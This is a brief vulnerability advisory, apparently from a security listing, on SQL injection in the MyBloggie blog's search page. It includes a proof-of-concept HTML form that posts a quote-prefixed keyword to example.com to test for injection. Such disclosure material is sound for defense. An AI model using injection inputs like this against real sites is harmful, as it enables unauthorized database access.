|
|
MyBloggie Search.PHP SQL Injection Vulnerability
No exploit is required. An example proof of concept has been supplied: <HTML><BODY> <form action="http://www.example.com/myBloggie/index.php?mode=search" method="post" name="search" onsubmit="return checkForm(this)"><center><input type="text" name="keyword" size="12" value="'SQLInjection"> <input type="submit" value="Inject this"></center></form> </BODY></HTML> |
|
Privacy Statement |